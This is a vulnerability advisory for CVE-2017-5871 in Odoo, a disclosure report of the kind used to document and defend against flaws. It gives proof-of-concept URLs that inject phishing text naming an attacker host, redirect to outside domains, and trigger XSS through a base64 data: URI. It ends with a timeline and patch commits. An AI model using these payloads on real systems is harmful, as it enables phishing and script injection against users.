Odoo is a well-known ERP open source software.

We found an open redirection vulnerability in the software.

Arbitrary error message

On the login page (/web/login) and the database selection page (/web/database/selector), an URL parameter is available to show an error message. It is used to inform users of any issue with the authentication process. Unfortunately, the content of this parameter is not restricted, so that it can be tampered to drive a social engineering attack. There is also a redirect parameter that is not restricted to other domain and where the schema is not limited to HTTP/HTTPS leading to possible arbitrary redirect or an XSS on the same pages.

CVE ID: CVE-2017-5871

Access Vector: remote

Security Risk: medium

Vulnerability: CWE-601

CVSS Score (v3): 5.4

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Proof of Concept : malicious URL in error message

Access to the following URL with the error parameter set with the desired message :

Login page :

http://odoo.srv/web/login?error=Please%20login%20to%20http://attacker.odoo.srv/%20to%20recover%20your%20account

Database selector page :

http://odoo.srv/web/database/selector?error=Please%20login%20to%20http://attacker.odoo.srv/%20to%20recover%20your%20account

This parameter is not vulnerable to XSS, thus it is not a critical issue. However, it would be useful to a phishing scenario.

Proof of Concept : malicious redirection

Access the following URL with the redirect parameter set with the URL (encoded) to redirect.

http://localhost:8069/web/session/logout?redirect=https%3a%2f%2fsysdream.com%2f

We can also get an XSS from this redirection by injecting the below payload.

http://localhost:8069/web/login?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=

Access the following URL with the redirect parameter set with the URL (encoded) to redirect (also affects version 9).

http://localhost:8069/web/session/logout?redirect=https%3a%2f%2fsysdream.com%2f

Access the following URL with the redirect parameter set with the URL (encoded) to redirect.

http://localhost:8069/web/dbredirect?redirect=https%3a%2f%2fsysdream.com%2f

Timeline (dd/mm/yyyy)

  • 06/01/2017 : Initial discovery by Romain E. Silva
  • 10/01/2017 : Further testing and exploitation techniques by Adel Nettar
  • 17/02/2017 : Reporting to Odoo
  • 28/02/2017 : Odoo acknowledge the report.
  • 29/03/2017 : Sysdream Labs request for an ETA.
  • 21/04/2017 : Warning for public disclosure.
  • 21/04/2017 : Odoo say that the bugfix is still under testing.
  • 28/04/2017 : Odoo provides a patch for the potential XSS vulnerability.
  • 23/06/2017 : Odoo publish a security advisory https://github.com/odoo/odoo/issues/17800 with the commits list that fixes the vulnerabilities.
  • 29/09/2017 : Public disclosure on sysdream.com

Affected versions

  • Version 8.0 before d655824
  • Version 9 before 692f47d
  • Version 10 before eaa3682

Solution

(From the Odoo GitHub issue #17800)

The following list contains the revisions after which the vulnerability is corrected:

  • 8.0: d655824
  • 9.0: 692f47d
  • 10.0: eaa3682
  • 10.0-ent and 9.0-ent (Enterprise): see 9.0 and 10.0.

Credits

  • Romain E Silva, Sysdream <r.esilva -at- sysdream -dot- com>
  • Adel Nettar, Sysdream <a.nettar -at- sysdream -dot- com>